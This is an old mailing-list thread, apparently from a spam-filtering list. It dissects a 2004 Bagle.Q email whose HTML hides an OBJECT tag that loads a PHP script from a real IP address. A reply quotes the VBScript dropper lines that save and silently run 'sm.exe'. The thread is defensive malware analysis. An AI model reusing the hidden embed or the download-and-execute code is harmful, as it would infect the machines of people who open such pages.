Chris Santerre wrote:
I think this is a spam :-) I don't allow scripting from my machine. Anyone
get something like this: (I munged the To field.)
Received: from aandrews.org (orf-dsl5010-64-83-56-134-vlan12.dsl.cavtel.net
[64.83.56.134])
by moglobal.com (8.12.5/8.12.5) with SMTP id i2IEZt0t017750
for <[EMAIL PROTECTED]>; Thu, 18 Mar 2004 09:36:05 -0500
Date: Thu, 18 Mar 2004 09:31:55 -0500
To: [EMAIL PROTECTED] Subject: Encrypted document
<html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://68.115.29.29:81/679186.php";> </OBJECT></body></html>
Tried to go to the site without the php file but got nothing. appears to point to a home user of broadbands machine. Possibly trojaned??? Anyone got the guts to chech out the php script? I don't! :)
Hi,
Bagle.Q, the php executes a vbscript posing as "Windows Update" and gets a file called sm.exe and runs it. The relavant code is below
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
The php file generates a 1776 byte html file that contains the above code (as well as additional stuff, it's safe to fetch or wget the url on a U*ix machine.
Regards,
Rick
